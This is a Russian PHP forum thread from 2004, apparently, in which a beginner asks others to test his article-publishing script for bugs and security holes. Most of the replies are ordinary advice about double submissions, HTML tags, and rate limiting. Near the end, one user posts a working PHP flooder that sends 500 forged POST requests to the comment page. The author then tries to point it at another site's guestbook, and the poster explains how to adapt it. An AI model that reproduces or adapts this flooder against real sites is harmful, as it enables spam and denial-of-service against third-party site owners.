Модераторы: skyboy, MoLeX, Aliance, ksnk

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> Написал первый скрипт, протестите на безопасность и пр. 
:(
    Опции темы
Гость_RaZoR
Дата 30.5.2004, 18:30 (ссылка)    |    (голосов: 0) Загрузка ... Загрузка ... Быстрая цитата Цитата


Unregistered











написал свой первый скрипт на пхп.. скрипт статей.. хочу предложить вам на рассмотрение. там практически все готово, единственное еще разделы сделаю потом.. Потестите его на безопасность и глюки плз. Сразу говорю, некоторые идеи брал из других скриптов. Заранее спасибо.
Вот линк: http://filmoscope.h12.ru/test/
  Вверх
Elfet
Дата 30.5.2004, 19:13 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Белый и Пушистый
****


Профиль
Группа: Awaiting Authorisation
Сообщений: 3776
Регистрация: 2.4.2003

Репутация: нет
Всего: 16



Я зажал кнопку добавить и коментарии полезли много раз smile.gif
И место для ввода почты маленькое, [email protected] не влезла smile.gif
И ещё урезай строчки вот так: substr($str, 0, $max);
И все коментарии на одной странице не хорошо smile.gif

Это сообщение отредактировал(а) Elfet - 30.5.2004, 19:14


--------------------
PM MAIL WWW Skype   Вверх
Dr.Death
Дата 30.5.2004, 20:03 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Участник Клуба
Сообщений: 950
Регистрация: 15.7.2003
Где: Волгоград

Репутация: нет
Всего: 1



Цитата
substr($str, 0, $max);

А еще альтернатива, вот так:
Код

$n = 50;//аналогично $max
$text = eregi("(.*){$n}",$text);




--------------------
Жизнь коротка, чтобы быть в ней слабым.© Арнольд Шварцнеггер
PM MAIL WWW ICQ   Вверх
Гость_RaZoR
Дата 30.5.2004, 20:05 (ссылка)    |    (голосов: 0) Загрузка ... Загрузка ... Быстрая цитата Цитата


Unregistered











ого-го.. щас править буду..
там ведь езе можно зарегатсья и самому статьи добавлять..
  Вверх
Гость_RaZoR
Дата 30.5.2004, 20:22 (ссылка)    |    (голосов: 0) Загрузка ... Загрузка ... Быстрая цитата Цитата


Unregistered











насчет емайла поставил на 30..
и то вы больше не сможете сделать.. тестите дальше
  Вверх
Гость_RaZoR
Дата 30.5.2004, 20:38 (ссылка)    |    (голосов: 0) Загрузка ... Загрузка ... Быстрая цитата Цитата


Unregistered











разделение комментариев по странично сделаю позже..
Ну что, кто еще найдет глюки? wink.gif
  Вверх
GePo
Дата 31.5.2004, 08:08 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бывалый
*


Профиль
Группа: Участник
Сообщений: 166
Регистрация: 30.3.2003
Где: Москва

Репутация: 1
Всего: 3



Не исправил ты если много раз жать. Можешь посмотреть, комментарии "haha" добавлены буквально за 5 сек
--------------------
PM MAIL WWW   Вверх
Гость_RaZoR
Дата 31.5.2004, 10:39 (ссылка)    |    (голосов: 0) Загрузка ... Загрузка ... Быстрая цитата Цитата


Unregistered











ладно, вечером поправлю..
  Вверх
Гость_RaZoR
Дата 31.5.2004, 18:42 (ссылка)    |    (голосов: 0) Загрузка ... Загрузка ... Быстрая цитата Цитата


Unregistered











так, сделал почти все, осталось только защиту от повторного нажатия сделать.. может еще кто что найдет?
  Вверх
Elfet
Дата 1.6.2004, 18:02 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Белый и Пушистый
****


Профиль
Группа: Awaiting Authorisation
Сообщений: 3776
Регистрация: 2.4.2003

Репутация: нет
Всего: 16



Цитата
защиту от повторного нажатия сделать

Можно сделать как сдесь , на форуме thumbs-up.gif



--------------------
PM MAIL WWW Skype   Вверх
Axxent
Дата 1.6.2004, 18:55 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бывалый
*


Профиль
Группа: Участник
Сообщений: 223
Регистрация: 25.3.2004
Где: Новосибирск

Репутация: 3
Всего: 5



Да, весьма действенная защита, надо сказать! Всего-то: onclick="javascript:this.disabled='true'" Или <script> form.onsubmit = form.subm_butt.disabled="true" </script> (подразумевается что form - название формы, а subm_butt - кнопки "Добавить")

Это сообщение отредактировал(а) Axxent - 1.6.2004, 18:59
PM MAIL ICQ   Вверх
dargaard
Дата 1.6.2004, 19:56 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Экс. модератор
Сообщений: 450
Регистрация: 7.5.2004

Репутация: нет
Всего: 25



Gliuk - esli pri dobavlenii statii ispolzovat tagi to prosto statia ne budet visvechivatsa nikak. i eshe sdelai ogronichenia
na width i height i img tagov.



--------------------
Ты должна сделать добро из зла 
потому что его больше не из чего
сделать. Р.П.Уоррен
PM MAIL WWW ICQ   Вверх
Гость_RaZoR
Дата 2.6.2004, 13:02 (ссылка)    |    (голосов: 0) Загрузка ... Загрузка ... Быстрая цитата Цитата


Unregistered











2Elfet & 2Axxent
Я так и хотел сделать, но посоветовался с людьми некоторыми и они сказали, что js можно легко обойти, поэтому скоро сделаю подругому. типа сравнивается с последним(ими) добавленными уже и если уже такой комментарий есть, то не добавлять..
  Вверх
Гость_RaZoR
Дата 2.6.2004, 13:02 (ссылка)    |    (голосов: 0) Загрузка ... Загрузка ... Быстрая цитата Цитата


Unregistered











2dargaard
Спасибо, скоро сделаю(наверное сегодня)..
  Вверх
RaZoR
Дата 2.6.2004, 14:35 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



Теперь вот здесь тестирование: http://filmoscope.h12.ru/
PM MAIL ICQ   Вверх
Axxent
Дата 2.6.2004, 16:12 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бывалый
*


Профиль
Группа: Участник
Сообщений: 223
Регистрация: 25.3.2004
Где: Новосибирск

Репутация: 3
Всего: 5



Знаешь, если ты делаешь защиту от случайных повторных отправок, то JS - это самое то. Ну а если уж тебе надо защиту от хакеров, типа от заваливания твоих новостей одинаковыми сообщениями - ну, тогда наверное правда надо сделать таймаут ожидания после отправки сообщения на стороне сервера smile.gif
PM MAIL ICQ   Вверх
RaZoR
Дата 2.6.2004, 16:53 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



2Axxent
хорошо, тогда так и сделаю.. js.. посмотрим что выйдет.. хакеры если захотят, то все-равно взломают..
PM MAIL ICQ   Вверх
RaZoR
Дата 2.6.2004, 17:20 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



все, защиту от повторного нажатия сделал..
PM MAIL ICQ   Вверх
dargaard
Дата 2.6.2004, 19:21 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Экс. модератор
Сообщений: 450
Регистрация: 7.5.2004

Репутация: нет
Всего: 25



pri dobavlenii statii vse ravno mozhno ispolzovat' v opisanii nekotorie tagi
(pri etom sozdastsia statia bez vsiakogo nazvania;) )


--------------------
Ты должна сделать добро из зла 
потому что его больше не из чего
сделать. Р.П.Уоррен
PM MAIL WWW ICQ   Вверх
RaZoR
Дата 2.6.2004, 21:09 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



2dargaard
да, я знаю, я это еще не поправил.. скоро будет.. а пока на bbcode все передал.. ща залью..
Добавлено @ 21:10
и у картинок кое-что изменил..
PM MAIL ICQ   Вверх
RaZoR
Дата 3.6.2004, 15:21 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



сделал защиту от двойного нажатия при добавлении комментариев.. щас сделаю, чтобы нельзя было без названия добавлять статью..
PM MAIL ICQ   Вверх
Elfet
Дата 3.6.2004, 15:58 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Белый и Пушистый
****


Профиль
Группа: Awaiting Authorisation
Сообщений: 3776
Регистрация: 2.4.2003

Репутация: нет
Всего: 16



И ещё сразу лучше под хороший дизайн движок делать smile.gif


--------------------
PM MAIL WWW Skype   Вверх
RaZoR
Дата 3.6.2004, 16:19 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



Elfet
ну.. если есть движок, то под дизайн подстроить это 5 сек(т.к. все не шаблонах), а если делать сразу на хорошем дизайне(много картинок и пр.), то будет долго грузиться..
PM MAIL ICQ   Вверх
RaZoR
Дата 5.6.2004, 13:50 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



ну что, нету чтоли больше багов? если так, то всем спасибо за тесты.. буду дальше писать другие скрипты..
PM MAIL ICQ   Вверх
RaZoR
Дата 5.6.2004, 16:10 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



вот тут 3 статьи интересные есть. есть желание - прочитайте.. есть интересные статьи(рассказы) - добавляйте..
http://filmoscope.h12.ru/index.php?id=15
http://filmoscope.h12.ru/index.php?id=14
http://filmoscope.h12.ru/index.php?id=8
PM MAIL ICQ   Вверх
RaZoR
Дата 5.6.2004, 22:31 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



народ! сделал разделы, потестите плз! наверняка есть глюки..
PM MAIL ICQ   Вверх
RaZoR
Дата 9.6.2004, 15:52 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



ладно, всем спасибо, на этом думаю закончим тестирование. думаю багов больше нет.
PM MAIL ICQ   Вверх
yUAC
Дата 9.6.2004, 19:14 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 103
Регистрация: 9.6.2004

Репутация: 3
Всего: 3



Нипавезло твоим комментариям... Правда защита самого хостинга спасла. Так бы снесло нафиг там все smile.gif
PM MAIL   Вверх
RaZoR
Дата 9.6.2004, 19:32 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



yUAC
ого, эт ты как делал? прогой какой-нить? как можно защититься от этого?
PM MAIL ICQ   Вверх
yUAC
Дата 9.6.2004, 19:46 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 103
Регистрация: 9.6.2004

Репутация: 3
Всего: 3



Не поверишь, маленький скриптик написал:

Код

<?
$host='filmoscope.h12.ru';
$adr='/comments.php?id=2&part=main';
$ref='http://'.$host.$adr;
set_time_limit(0);
//**

// Формируем запрос.
echo '<!-- '.str_repeat('-',256).' -->';

for($i=0;$i<500;$i++)
{
$f = fsockopen($host, 80);

$query_str = "name=flooder&text=".urlencode('Flood number '.$i.', for stability additional is '.rand());

$output = "POST ".$adr." HTTP/1.0\n";
$output .= "Host: ".$host."\n";
$output .= "User-Agent: Hackzilla/5.0 (U; Windows Longhorn; en-US; rv:1.5) Gecko/2005/1007";
$output .= "Accept: application/microsoft-word;q=0.2,*/*;q=0.1\n";
$output .= "Accept-Language: ru,en;q=0.8,en-gb;q=0.5,en-us;q=0.3";

$output .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
$output .= "Keep-Alive: 300";
$output .= "Referer: ".$ref."\n";
$output .= "Content-Type: application/x-www-form-urlencoded\n";
$output .= "Content-Length: ".strlen($query_str)."\n";
$output .= "Connection: keep-alive\n\n";
$output .= $query_str;

fputs($f, $output);
fclose($f);
// Принимаем ответ.
/*$recieved = "";
while (!feof($f)) $recieved .= fgets($f, 500);
echo $recieved;*/
//**
echo '.&shy;';
flush();
}
?>


Хорошо флудит, между прочим. А защищаться довольно просто... Записывать в файлик дату последнего добавления сообщения для этого комментария. И первым делом её доставать, смотреть, если она скажем меньше 20 секунд, то выставить её опять на 20 секунд и сказать, что типа низя добавлять так часто комментарии. И все. Обычно помогает даже при такой атаке (конечно, парочка сообщений может «пробиться», но не более того)
PM MAIL   Вверх
RaZoR
Дата 9.6.2004, 20:04 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



ок, большое спасибо, обязательно поправлю..
PM MAIL ICQ   Вверх
yUAC
Дата 9.6.2004, 20:26 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 103
Регистрация: 9.6.2004

Репутация: 3
Всего: 3



Пожалуйста... Всегда рад помочь biggrin.gif
PM MAIL   Вверх
RaZoR
Дата 10.6.2004, 15:08 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



н-да.. че-то я никак не придумаю как эту защиту сделать.. можно конечно через куки, но их всегда можно отключить, тогда как?
PM MAIL ICQ   Вверх
RaZoR
Дата 10.6.2004, 21:19 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



yUAC
можно у тебя узнать кое-что насчет твоего скрипта? почему если я на другой сайт прописываю его, то пишет ошибка коннекта? что нужно еще поменять?
PM MAIL ICQ   Вверх
yUAC
Дата 10.6.2004, 21:29 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 103
Регистрация: 9.6.2004

Репутация: 3
Всего: 3



Надо ему еще немножко $query_str поменять под нужный сайт, чтобы POST-данные отправлялись. Если нужно посмотреть, что выдает сервер, снимите комментарий оттуда (там где принимаем ответ) и поставьте цикл на 2 оборота
PM MAIL   Вверх
RaZoR
Дата 10.6.2004, 22:14 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



$query_str поменял как надо..цикл поставил.. пишет:

Warning: fsockopen(): php_hostconnect: connect failed in ... on line 13
Warning: fsockopen(): unable to connect to ***:80 in ... on line 13
Warning: fputs(): supplied argument is not a valid stream resource in ... on line 31
Warning: fclose(): supplied argument is not a valid stream resource in ... on line 32
Warning: feof(): supplied argument is not a valid stream resource in ... on line 35
Warning: fgets(): supplied argument is not a valid stream resource in ... on line 35
Warning: feof(): supplied argument is not a valid stream resource in ... on line 35
Warning: fgets(): supplied argument is not a valid stream resource in ... on line 35
Warning: feof(): supplied argument is not a valid stream resource in ... on line 35
Warning: fgets(): supplied argument is not a valid stream resource in ... on line 35

и т.д. вместо точек(...) там путь к скрипту, а вместо звездочек(***) сервер.. типа myserver.com


Добавлено @ 22:18
даже хост не открывается.. написал так:
Код
$host='***.ru';
$adr='/guestbook/guestbook.php?book=form';
$ref='http://'.$host.$adr;
set_time_limit(0);

echo '<!-- '.str_repeat('-',256).' -->';

for($i=0;$i<2;$i++)
{
$f = fsockopen($host, 80);


вот это 13 строка как раз..

Это сообщение отредактировал(а) RaZoR - 10.6.2004, 22:18
PM MAIL ICQ   Вверх
RaZoR
Дата 12.6.2004, 11:44 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 97
Регистрация: 6.5.2004
Где: Оренбург

Репутация: нет
Всего: 1



ну так что, yUAC?
PM MAIL ICQ   Вверх
Страницы: (3) [Все] 1 2 3 
Ответ в темуСоздание новой темы Создание опроса
Правила форума "PHP"
Aliance
IZ@TOP
skyboy
SamDark
MoLeX

Новичкам:

  • PHP редакторы собираются и обсуждаются здесь
  • Электронные книги по PHP, документацию можно найти здесь
  • Интерпретатор PHP, полную документацию можно скачать на PHP.NET

Важно:

  • Не брезгуйте пользоваться тегами [code=php]КОД[/code] для повышения читабельности текста/кода.
  • Перед созданием новой темы воспользуйтесь поиском и загляните в FAQ
  • Действия модераторов можно обсудить здесь

Внимание:

  • Темы "ищу скрипт", "подскажите скрипт" и т.п. будут переноситься в форум "Web-технологии"
  • Темы с именами: "Срочно", "помогите", "не знаю как делать" будут УДАЛЯТЬСЯ

Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, IZ@TOP, skyboy, SamDark, MoLeX, awers.

 
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | PHP: Общие вопросы | Следующая тема »


 




[ Время генерации скрипта: 0.0863 ]   [ Использовано запросов: 22 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.